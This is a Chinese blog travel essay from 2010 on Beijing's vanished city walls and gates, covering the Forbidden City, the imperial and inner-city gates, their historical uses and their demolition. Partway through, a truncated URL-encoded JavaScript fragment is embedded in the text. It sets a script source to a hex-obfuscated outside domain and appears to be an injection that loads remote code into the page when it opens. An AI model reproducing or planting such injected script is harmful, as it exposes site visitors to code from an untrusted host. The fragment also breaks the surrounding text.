注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

芊芊细语

白桦林里风吹过......

 
 
 

日志

 
 

从消失的北京城门谈起  

2010-07-12 07:35:20|  分类: 游记 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

      这个月,这几天。北京市发表一份通告:原北京市宣武区、崇文区分别划归东城区、西城区。同时表示:要更好的保护北京城的古建筑(大意)。

  有着3000多条的北京老胡同如今剩下不到600条,老城面积连湖泊算在内不足16平方公里。上千年积淀的北京文化正被日新月异、活力四射的新北京淘汰,站在国际大都市新北京面前,却总是想起逝去的岁月和古老文化。我是不是成了九斤老太?

 

 

 古老的北京城,建筑是十分讲究的。外城、内城、皇城,下来才是最中心的紫禁城,皇帝居住在这里。连起这一座座城的是高大的城墙,可惜大部分在上个世纪五十年代初都拆掉了。城墙与城墙之间,曾耸立着巍峨的城楼,城楼下自然是一座座城门。可惜也不存在了。现在恢复的一些城楼城门,是用现代化的计算机设计出来的,多了华丽,少了古韵,更没了历史的厚重和沧桑感。

 先说紫禁城:红墙黄瓦长达6里的城墙将金碧辉煌的紫禁城团团围住,四个方位共有六座城门,这就是:天安门、端门、午门、神武门、东华门、西华门。天安门已经成为新中国和北京的象征,依次从天安门、端门、午门进去,就会看见巍峨高耸的太和、中和、保和三大殿,那是皇帝办公的地方。是决策天下大事的地方,是关国计民生的地方,自然巍峨、庄严、肃穆。往后走,是皇帝的内宫,两边分东、西两宫,嫔妃、贵人、皇后们曾在这里演出一幕幕悲欢离合。有风花雪月、也有剑拔弩张、惊心动魄。一直到走出神武门,游人才会长长地出一口气。

  包括紫禁城、中、南、北海和景山在内的过去都叫做皇城,皇城城墙全长18里,曾有六个门。分别为;大清门、长安左、右门、东、西安门,还有就是我们熟悉的只留下地名的地安门。神武门与地安门之间,有大片的绿地、有宽宽的护城河,有巍峨的角楼、护城河边栽有垂柳。早春漫步,你会想起“草色遥看近却无、绝胜烟柳满皇都“的诗句。

  出了皇城就是内城了。内城也是用城墙围住的,长达40里的城墙在东、西、南、北四个方向开有九座城门,九座城门各有各的功能。正对着紫禁城的正阳门,前门,是皇帝出城祭天的专用通道。

  左文右武的崇文门和宣武门,崇文门是文武大臣上朝的通道。这道门象征光明昌盛,它的别称“哈达门”曾是一种有名香烟的商标。宣武门则象征着威严,执行死刑犯要走宣武门,出门后到菜市口,历史上有名的戊戌七君子就在这里慷慨就义。

  城东的东直门和朝阳门因为靠近古运河,依托运河运来的木料、粮食都是经过这两座门运进城内的。遥想当年,通州地区古运河码头车装船载,一定熙熙攘攘、热闹非凡。

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D">  城西是风景美丽的玉泉山和能源丰富的门头沟,皇宫里需要的水和煤自然从西直门、和阜成门运进来,相传九座城门关的最晚的是负责运水的西直门,小小毛驴拉着水车,洒着水花,叮叮当当,不紧不慢地前行,也算是当年京城一景吧。阜成门曾叫“齐化门”。电影《城南旧事》里提到过。那时候冬天很冷,缺衣少穿的穷人,走投无路饿死、冻死倒毙街头后,多埋在这座城门以外了。

  坐落在城北的安定门、德胜门肯定和军事有关。军队出征前一定走德胜门,凯旋而归,自然是安定门。旌旗猎猎、鼓号咚咚,铠甲闪闪,保国保家保平安,古今一个道理啊。

  为保证皇帝去天坛祭天,环城南还修建过城墙,也有7个城门,这就是东、西便门,左、右安门、广安门、广渠门、永定门。出正阳门到永定门的大片地方,是京城百姓居住的地方,也是最有生命活力的地方。生活在天子脚下的黎民百姓,日出而作、日落而归,一代又一代生生不息。这里的老人、老房子、老地名、老字号、老街道老而不朽,人世间的喜、怒、哀、乐构成了无数《小城故事》

 有着600多年历史的北京老城墙,毁灭在上个世纪疯狂的六、七十年代,反修防修,准备打仗,在备战备荒为人民的口号下,北京城修起弯弯曲曲的地道,从城墙上拆下来的明代砖头,都不客气地用在这个工程里。后随着人口急剧增长,为解决交通拥挤,要修地铁,沿着北京的城墙地铁开通了,精美的城门和城楼从古老的北京城,从人们的视线里,消失了。

 现在和将来,人们只能借助文字去体验和回忆城墙的壮美、古老、沧桑。那应该是我们中华民族的一份珍贵遗产。

                                             

                                 岁月远去

 

 

  评论这张
 
阅读(553)| 评论(35)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017